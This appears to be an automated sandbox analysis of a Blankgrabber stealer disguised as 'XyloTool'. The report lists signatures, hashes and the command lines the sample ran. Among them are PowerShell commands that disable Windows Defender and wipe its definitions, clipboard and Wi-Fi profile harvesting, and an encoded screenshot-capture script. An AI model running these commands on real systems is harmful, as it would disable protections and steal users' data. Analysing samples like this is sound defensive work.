Analysis Overview
SHA256
79fe80b6762a5ee29c76185cd062fcf832deb1620f04ddc4de50d3358ca9373f
Threat Level: Known bad
The file XyloTool.rar was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
A stealer written in Python and packaged with PyInstaller
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Detects videocard installed
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-22 19:00
Signatures
A stealer written in Python and packaged with PyInstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 19:00
Reported
2024-06-22 19:03
Platform
win7-20240220-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2872 wrote to memory of 2528 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
| PID 2872 wrote to memory of 2528 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
| PID 2872 wrote to memory of 2528 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI28722\python310.dll
| MD5 | b93eda8cc111a5bde906505224b717c3 |
| SHA1 | 5f1ae1ab1a3c4c023ea8138d4b09cbc1cd8e8f9e |
| SHA256 | efa27cd726dbf3bf2448476a993dc0d5ffb0264032bf83a72295ab3fc5bcd983 |
| SHA512 | b20195930967b4dc9f60c15d9ceae4d577b00095f07bd93aa4f292b94a2e5601d605659e95d5168c1c2d85dc87a54d27775f8f20ebcacf56904e4aa30f1affba |
memory/2528-23-0x000007FEF5E90000-0x000007FEF62F5000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 19:00
Reported
2024-06-22 19:03
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.0.782428414\768569740" -parentBuildID 20230214051806 -prefsHandle 1760 -prefMapHandle 1752 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {abdd5e5d-a614-4854-b40d-5c005b7f774a} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 1852 223b690c158 gpu
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.1.1458366632\1864088594" -parentBuildID 20230214051806 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653780f5-6a4f-44d0-bc9c-a63052288364} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 2468 223a9c86558 socket
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.2.787937635\789137508" -childID 1 -isForBrowser -prefsHandle 3324 -prefMapHandle 3320 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce975ee2-25b4-422f-93a7-f426a8851135} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 3336 223b9421858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.3.1397786790\886112756" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e87b9a6-8c93-49d9-8e24-eb6d32041b8b} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 3680 223bb1bb158 tab
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAH
QAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8Ad